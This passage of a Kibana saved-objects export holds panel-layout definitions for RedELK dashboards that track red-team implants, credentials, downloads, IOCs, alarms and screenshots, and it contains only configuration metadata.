":48,\"h\":2,\"i\":\"a5e43e90-aa23-403a-9167-bfe8aff7fb6c\"},\"panelIndex\":\"a5e43e90-aa23-403a-9167-bfe8aff7fb6c\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_a5e43e90-aa23-403a-9167-bfe8aff7fb6c\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":54,\"w\":48,\"h\":19,\"i\":\"b9915fcd-f22e-4326-986a-25684f947b79\"},\"panelIndex\":\"b9915fcd-f22e-4326-986a-25684f947b79\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_b9915fcd-f22e-4326-986a-25684f947b79\"}]", "refreshInterval": {"pause": false, "value": 30000}, "timeFrom": "now-30d", "timeRestore": true, "timeTo": "now", "title": "RedELK - Implants dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "117dbba0-c6f5-11e8-a9c6-cd307b96b1ba", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern"}, {"id": "e12434d0-b8e8-11e8-94dd-171ae5c1fd1a", "name": "1:panel_1", "type": "visualization"}, {"id": "88003df0-b8ec-11e8-94dd-171ae5c1fd1a", "name": "2:panel_2", "type": "visualization"}, {"id": "10dcc4a0-b8e7-11e8-94dd-171ae5c1fd1a", "name": "3:panel_3", "type": "visualization"}, {"id": "f0dcbda0-b8e5-11e8-94dd-171ae5c1fd1a", "name": "4:panel_4", "type": "visualization"}, {"id": "a1efc620-b8e4-11e8-94dd-171ae5c1fd1a", "name": "5:panel_5", "type": "visualization"}, {"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "a5e43e90-aa23-403a-9167-bfe8aff7fb6c:panel_a5e43e90-aa23-403a-9167-bfe8aff7fb6c", "type": "visualization"}, {"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "b9915fcd-f22e-4326-986a-25684f947b79:panel_b9915fcd-f22e-4326-986a-25684f947b79", "type": "search"}], "sort": [1642171876916, 56], "type": "dashboard", "version": "1"} -{"attributes": {"description": "MITRE ATT&CK dashboard showing TTPs used (SIEM detection must be configured first)", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":21,\"h\":17,\"i\":\"e4271670-160e-444d-bb78-46ae1e1c7339\"},\"panelIndex\":\"e4271670-160e-444d-bb78-46ae1e1c7339\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"MITRE ATT&CK Tactics\",\"panelRefName\":\"panel_e4271670-160e-444d-bb78-46ae1e1c7339\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":21,\"y\":2,\"w\":27,\"h\":17,\"i\":\"6b3738e3-3bd8-417f-866a-f7c990b0b6f8\"},\"panelIndex\":\"6b3738e3-3bd8-417f-866a-f7c990b0b6f8\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"MITRE ATT&CK Techniques\",\"panelRefName\":\"panel_6b3738e3-3bd8-417f-866a-f7c990b0b6f8\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":19,\"w\":24,\"h\":15,\"i\":\"de3ced26-2a55-43f5-af28-dc5c2b967c29\"},\"panelIndex\":\"de3ced26-2a55-43f5-af28-dc5c2b967c29\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_de3ced26-2a55-43f5-af28-dc5c2b967c29\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":19,\"w\":24,\"h\":15,\"i\":\"38e24827-8707-4583-805a-98e4138495a7\"},\"panelIndex\":\"38e24827-8707-4583-805a-98e4138495a7\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_38e24827-8707-4583-805a-98e4138495a7\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":34,\"w\":48,\"h\":15,\"i\":\"60dc249a-1ad0-456c-850b-95c77ea0bc18\"},\"panelIndex\":\"60dc249a-1ad0-456c-850b-95c77ea0bc18\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_60dc249a-1ad0-456c-850b-95c77ea0bc18\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"3b895da0-50d0-49e0-a18d-790fd2dddaaa\"},\"panelIndex\":\"3b895da0-50d0-49e0-a18d-790fd2dddaaa\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_3b895da0-50d0-49e0-a18d-790fd2dddaaa\"}]", "timeRestore": false, "title": "RedELK - MITRE ATT&CK", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "3ed7a630-d051-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "ff3c3b80-d050-11ea-9301-a30a04251ae9", "name": "e4271670-160e-444d-bb78-46ae1e1c7339:panel_e4271670-160e-444d-bb78-46ae1e1c7339", "type": "visualization"}, {"id": "abdcd940-d050-11ea-9301-a30a04251ae9", "name": "6b3738e3-3bd8-417f-866a-f7c990b0b6f8:panel_6b3738e3-3bd8-417f-866a-f7c990b0b6f8", "type": "visualization"}, {"id": "2f5a2760-d050-11ea-9301-a30a04251ae9", "name": "de3ced26-2a55-43f5-af28-dc5c2b967c29:panel_de3ced26-2a55-43f5-af28-dc5c2b967c29", "type": "visualization"}, {"id": "231792d0-d050-11ea-9301-a30a04251ae9", "name": "38e24827-8707-4583-805a-98e4138495a7:panel_38e24827-8707-4583-805a-98e4138495a7", "type": "visualization"}, {"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "60dc249a-1ad0-456c-850b-95c77ea0bc18:panel_60dc249a-1ad0-456c-850b-95c77ea0bc18", "type": "search"}, {"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "3b895da0-50d0-49e0-a18d-790fd2dddaaa:panel_3b895da0-50d0-49e0-a18d-790fd2dddaaa", "type": "visualization"}], "sort": [1642171876916, 63], "type": "dashboard", "version": "1"} -{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"5f3b82fd-613e-460e-a5a3-b7a9c9036060\"},\"panelIndex\":\"5f3b82fd-613e-460e-a5a3-b7a9c9036060\",\"embeddableConfig\":{\"hidePanelTitles\":true,\"enhancements\":{}},\"panelRefName\":\"panel_5f3b82fd-613e-460e-a5a3-b7a9c9036060\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":48,\"h\":2,\"i\":\"cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2\"},\"panelIndex\":\"cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2\",\"embeddableConfig\":{\"hidePanelTitles\":true,\"enhancements\":{}},\"panelRefName\":\"panel_cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":4,\"w\":16,\"h\":7,\"i\":\"cd30bef4-7955-437a-adaf-317839c35931\"},\"panelIndex\":\"cd30bef4-7955-437a-adaf-317839c35931\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_cd30bef4-7955-437a-adaf-317839c35931\"},{\"version\":\"7.10.0\",\"type\":\"search\",\"gridData\":{\"x\":16,\"y\":4,\"w\":21,\"h\":18,\"i\":\"cc62352b-f1ed-47fb-9687-d51a44693d13\"},\"panelIndex\":\"cc62352b-f1ed-47fb-9687-d51a44693d13\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_cc62352b-f1ed-47fb-9687-d51a44693d13\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":37,\"y\":4,\"w\":11,\"h\":18,\"i\":\"1d8af391-0559-412f-a001-12acc85b49ab\"},\"panelIndex\":\"1d8af391-0559-412f-a001-12acc85b49ab\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1d8af391-0559-412f-a001-12acc85b49ab\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":11,\"w\":16,\"h\":11,\"i\":\"cd45ce11-0279-476b-90c3-bd5733193a72\"},\"panelIndex\":\"cd45ce11-0279-476b-90c3-bd5733193a72\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_cd45ce11-0279-476b-90c3-bd5733193a72\"},{\"version\":\"7.10.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":22,\"w\":48,\"h\":16,\"i\":\"aa8ee839-556c-47ce-81af-451090b86f71\"},\"panelIndex\":\"aa8ee839-556c-47ce-81af-451090b86f71\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_aa8ee839-556c-47ce-81af-451090b86f71\"}]", "refreshInterval": {"pause": true, "value": 0}, "timeFrom": "now-15y", "timeRestore": true, "timeTo": "now", "title": "RedELK - Health", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "509e6a80-926a-11eb-a753-9da683898c26", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "5f3b82fd-613e-460e-a5a3-b7a9c9036060:panel_5f3b82fd-613e-460e-a5a3-b7a9c9036060", "type": "visualization"}, {"id": "45491770-0886-11eb-a2d2-171dc8941414", "name": "cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2:panel_cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2", "type": "visualization"}, {"id": "20fac240-926c-11eb-a753-9da683898c26", "name": "cd30bef4-7955-437a-adaf-317839c35931:panel_cd30bef4-7955-437a-adaf-317839c35931", "type": "visualization"}, {"id": "87530b40-9269-11eb-a753-9da683898c26", "name": "cc62352b-f1ed-47fb-9687-d51a44693d13:panel_cc62352b-f1ed-47fb-9687-d51a44693d13", "type": "search"}, {"id": "2f971ac0-926b-11eb-a753-9da683898c26", "name": "1d8af391-0559-412f-a001-12acc85b49ab:panel_1d8af391-0559-412f-a001-12acc85b49ab", "type": "visualization"}, {"id": "2f77a150-926a-11eb-a753-9da683898c26", "name": "cd45ce11-0279-476b-90c3-bd5733193a72:panel_cd45ce11-0279-476b-90c3-bd5733193a72", "type": "visualization"}, {"id": "654f76a0-9269-11eb-a753-9da683898c26", "name": "aa8ee839-556c-47ce-81af-451090b86f71:panel_aa8ee839-556c-47ce-81af-451090b86f71", "type": "search"}], "sort": [1642171876916, 71], "type": "dashboard", "version": "1"} -{"attributes": {"description": "RedELK alarms dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\"},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":18,\"h\":11,\"i\":\"74b481ca-ae10-4039-b6bf-474b5a409c0e\"},\"panelIndex\":\"74b481ca-ae10-4039-b6bf-474b5a409c0e\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed IOC over time\",\"panelRefName\":\"panel_74b481ca-ae10-4039-b6bf-474b5a409c0e\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":18,\"y\":2,\"w\":6,\"h\":11,\"i\":\"13abf5b9-28bf-4d51-9c63-2416603499e7\"},\"panelIndex\":\"13abf5b9-28bf-4d51-9c63-2416603499e7\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_13abf5b9-28bf-4d51-9c63-2416603499e7\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":6,\"h\":11,\"i\":\"e146bc43-4ec7-4fbb-8dcf-3df505b52932\"},\"panelIndex\":\"e146bc43-4ec7-4fbb-8dcf-3df505b52932\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_e146bc43-4ec7-4fbb-8dcf-3df505b52932\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":30,\"y\":2,\"w\":18,\"h\":11,\"i\":\"c8ae192f-f081-49eb-8e60-3122d0377314\"},\"panelIndex\":\"c8ae192f-f081-49eb-8e60-3122d0377314\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed traffic over time\",\"panelRefName\":\"panel_c8ae192f-f081-49eb-8e60-3122d0377314\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":13,\"w\":48,\"h\":14,\"i\":\"b95813af-9600-4e44-93de-9acfaa6f911c\"},\"panelIndex\":\"b95813af-9600-4e44-93de-9acfaa6f911c\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed IOC\",\"panelRefName\":\"panel_b95813af-9600-4e44-93de-9acfaa6f911c\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":27,\"w\":48,\"h\":17,\"i\":\"67fd9bda-6d1a-4089-a588-b683ad113558\"},\"panelIndex\":\"67fd9bda-6d1a-4089-a588-b683ad113558\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed traffic\",\"panelRefName\":\"panel_67fd9bda-6d1a-4089-a588-b683ad113558\"}]", "timeRestore": false, "title": "RedELK - Alarms dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "53b69200-d4e3-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "3ae6c0c0-d4e2-11ea-9301-a30a04251ae9", "name": "74b481ca-ae10-4039-b6bf-474b5a409c0e:panel_74b481ca-ae10-4039-b6bf-474b5a409c0e", "type": "visualization"}, {"id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", "name": "13abf5b9-28bf-4d51-9c63-2416603499e7:panel_13abf5b9-28bf-4d51-9c63-2416603499e7", "type": "visualization"}, {"id": "62b61920-d4e2-11ea-9301-a30a04251ae9", "name": "e146bc43-4ec7-4fbb-8dcf-3df505b52932:panel_e146bc43-4ec7-4fbb-8dcf-3df505b52932", "type": "visualization"}, {"id": "f7141500-d4e1-11ea-9301-a30a04251ae9", "name": "c8ae192f-f081-49eb-8e60-3122d0377314:panel_c8ae192f-f081-49eb-8e60-3122d0377314", "type": "visualization"}, {"id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "name": "b95813af-9600-4e44-93de-9acfaa6f911c:panel_b95813af-9600-4e44-93de-9acfaa6f911c", "type": "search"}, {"id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "name": "67fd9bda-6d1a-4089-a588-b683ad113558:panel_67fd9bda-6d1a-4089-a588-b683ad113558", "type": "search"}], "sort": [1642171876916, 79], "type": "dashboard", "version": "1"} -{"attributes": {"description": "RedELK downloads dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "optionsJSON": "{\"useMargins\":true,\"hidePanelTitles\":false}", "panelsJSON": "[{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":3,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\"},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":3,\"w\":24,\"h\":11,\"i\":\"8375955c-eab4-48d9-ac8a-e4de3dd6fab2\"},\"panelIndex\":\"8375955c-eab4-48d9-ac8a-e4de3dd6fab2\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_8375955c-eab4-48d9-ac8a-e4de3dd6fab2\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":3,\"w\":7,\"h\":11,\"i\":\"1e1864e7-1cbf-41bf-a9a5-8afadce8cadf\"},\"panelIndex\":\"1e1864e7-1cbf-41bf-a9a5-8afadce8cadf\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1e1864e7-1cbf-41bf-a9a5-8afadce8cadf\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":31,\"y\":3,\"w\":17,\"h\":11,\"i\":\"55aca97f-b1f0-43b1-af44-756fe59be5fc\"},\"panelIndex\":\"55aca97f-b1f0-43b1-af44-756fe59be5fc\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_55aca97f-b1f0-43b1-af44-756fe59be5fc\"},{\"version\":\"7.16.3\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":14,\"w\":48,\"h\":16,\"i\":\"9a987436-c698-4236-9b92-bfab81de8cc1\"},\"panelIndex\":\"9a987436-c698-4236-9b92-bfab81de8cc1\",\"embeddableConfig\":{\"sort\":[\"@timestamp\",\"desc\",[\"@timestamp\",\"desc\"]],\"enhancements\":{}},\"panelRefName\":\"panel_9a987436-c698-4236-9b92-bfab81de8cc1\"}]", "timeRestore": false, "title": "RedELK - Downloads dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "643de010-d04c-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "85446c80-d04b-11ea-9301-a30a04251ae9", "name": "8375955c-eab4-48d9-ac8a-e4de3dd6fab2:panel_8375955c-eab4-48d9-ac8a-e4de3dd6fab2", "type": "visualization"}, {"id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", "name": "1e1864e7-1cbf-41bf-a9a5-8afadce8cadf:panel_1e1864e7-1cbf-41bf-a9a5-8afadce8cadf", "type": "visualization"}, {"id": "41f94ad0-d04c-11ea-9301-a30a04251ae9", "name": "55aca97f-b1f0-43b1-af44-756fe59be5fc:panel_55aca97f-b1f0-43b1-af44-756fe59be5fc", "type": "visualization"}, {"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "9a987436-c698-4236-9b92-bfab81de8cc1:panel_9a987436-c698-4236-9b92-bfab81de8cc1", "type": "search"}], "sort": [1643016103992, 297], "type": "dashboard", "version": "1"} -{"attributes": {"description": "RedELK credentials dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"w\":48,\"x\":0,\"y\":0},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":11,\"i\":\"f26413a8-7bc3-4d63-8e2e-02d1c8e06b51\"},\"panelIndex\":\"f26413a8-7bc3-4d63-8e2e-02d1c8e06b51\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Credentials over time\",\"panelRefName\":\"panel_f26413a8-7bc3-4d63-8e2e-02d1c8e06b51\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":7,\"h\":11,\"i\":\"8c5ea210-ef6d-47a3-958b-16ccc6006582\"},\"panelIndex\":\"8c5ea210-ef6d-47a3-958b-16ccc6006582\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Total credentials\",\"panelRefName\":\"panel_8c5ea210-ef6d-47a3-958b-16ccc6006582\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":31,\"y\":2,\"w\":17,\"h\":11,\"i\":\"b98cc0b8-ee93-4d34-b458-cd311eb995ea\"},\"panelIndex\":\"b98cc0b8-ee93-4d34-b458-cd311eb995ea\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Credentials realms\",\"panelRefName\":\"panel_b98cc0b8-ee93-4d34-b458-cd311eb995ea\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":13,\"w\":48,\"h\":19,\"i\":\"77f94499-3c4b-49c0-8379-62d38f4d7d8e\"},\"panelIndex\":\"77f94499-3c4b-49c0-8379-62d38f4d7d8e\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_77f94499-3c4b-49c0-8379-62d38f4d7d8e\"}]", "timeRestore": false, "title": "RedELK - Credentials dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "82b865a0-d318-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "ab609c60-d319-11ea-9301-a30a04251ae9", "name": "f26413a8-7bc3-4d63-8e2e-02d1c8e06b51:panel_f26413a8-7bc3-4d63-8e2e-02d1c8e06b51", "type": "visualization"}, {"id": "dcf86190-d319-11ea-9301-a30a04251ae9", "name": "8c5ea210-ef6d-47a3-958b-16ccc6006582:panel_8c5ea210-ef6d-47a3-958b-16ccc6006582", "type": "visualization"}, {"id": "ff4497f0-d319-11ea-9301-a30a04251ae9", "name": "b98cc0b8-ee93-4d34-b458-cd311eb995ea:panel_b98cc0b8-ee93-4d34-b458-cd311eb995ea", "type": "visualization"}, {"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "77f94499-3c4b-49c0-8379-62d38f4d7d8e:panel_77f94499-3c4b-49c0-8379-62d38f4d7d8e", "type": "search"}], "sort": [1642171876916, 85], "type": "dashboard", "version": "1"} -{"attributes": {"description": "RedELK IOC dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"w\":48,\"x\":0,\"y\":0},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":11,\"i\":\"dfd53850-c595-4597-bbb5-ea03fc22e880\",\"w\":24,\"x\":0,\"y\":2},\"panelIndex\":\"dfd53850-c595-4597-bbb5-ea03fc22e880\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"IOC over time\",\"panelRefName\":\"panel_dfd53850-c595-4597-bbb5-ea03fc22e880\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":11,\"i\":\"f13deeb7-53dc-41af-9de0-486d7a171916\",\"w\":17,\"x\":31,\"y\":2},\"panelIndex\":\"f13deeb7-53dc-41af-9de0-486d7a171916\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"IOC Types\",\"panelRefName\":\"panel_f13deeb7-53dc-41af-9de0-486d7a171916\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":11,\"i\":\"133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70\",\"w\":7,\"x\":24,\"y\":2},\"panelIndex\":\"133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"h\":19,\"i\":\"d492599d-f662-450b-9982-54ab7db9f174\",\"w\":48,\"x\":0,\"y\":13},\"panelIndex\":\"d492599d-f662-450b-9982-54ab7db9f174\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_d492599d-f662-450b-9982-54ab7db9f174\"}]", "timeRestore": false, "title": "RedELK - IOC dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "86643e90-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "057076f0-d4e4-11ea-9301-a30a04251ae9", "name": "dfd53850-c595-4597-bbb5-ea03fc22e880:panel_dfd53850-c595-4597-bbb5-ea03fc22e880", "type": "visualization"}, {"id": "3729cde0-d4e4-11ea-9301-a30a04251ae9", "name": "f13deeb7-53dc-41af-9de0-486d7a171916:panel_f13deeb7-53dc-41af-9de0-486d7a171916", "type": "visualization"}, {"id": "5ffe8850-d4e4-11ea-9301-a30a04251ae9", "name": "133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70:panel_133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70", "type": "visualization"}, {"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "d492599d-f662-450b-9982-54ab7db9f174:panel_d492599d-f662-450b-9982-54ab7db9f174", "type": "search"}], "sort": [1642171876916, 91], "type": "dashboard", "version": "1"} -{"attributes": {"description": "RedELK screenshots dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\"},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":11,\"i\":\"d4eb5dce-3894-4599-8c17-042fc067d58c\"},\"panelIndex\":\"d4eb5dce-3894-4599-8c17-042fc067d58c\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Screenshots over time\",\"panelRefName\":\"panel_d4eb5dce-3894-4599-8c17-042fc067d58c\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":13,\"w\":48,\"h\":19,\"i\":\"1db7741d-210a-4331-b1cb-affc6ac1334e\"},\"panelIndex\":\"1db7741d-210a-4331-b1cb-affc6ac1334e\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1db7741d-210a-4331-b1cb-affc6ac1334e\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":7,\"h\":11,\"i\":\"3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0\"},\"panelIndex\":\"3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Total screenshots\",\"panelRefName\":\"panel_3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":31,\"y\":2,\"w\":17,\"h\":11,\"i\":\"66403011-8fb6-402f-b9b6-5f503d6df704\"},\"panelIndex\":\"66403011-8fb6-402f-b9b6-5f503d6df704\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Screenshots target users\",\"panelRefName\":\"panel_66403011-8fb6-402f-b9b6-5f503d6df704\"}]", "timeRestore": false, "title": "RedELK - Screenshots dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": 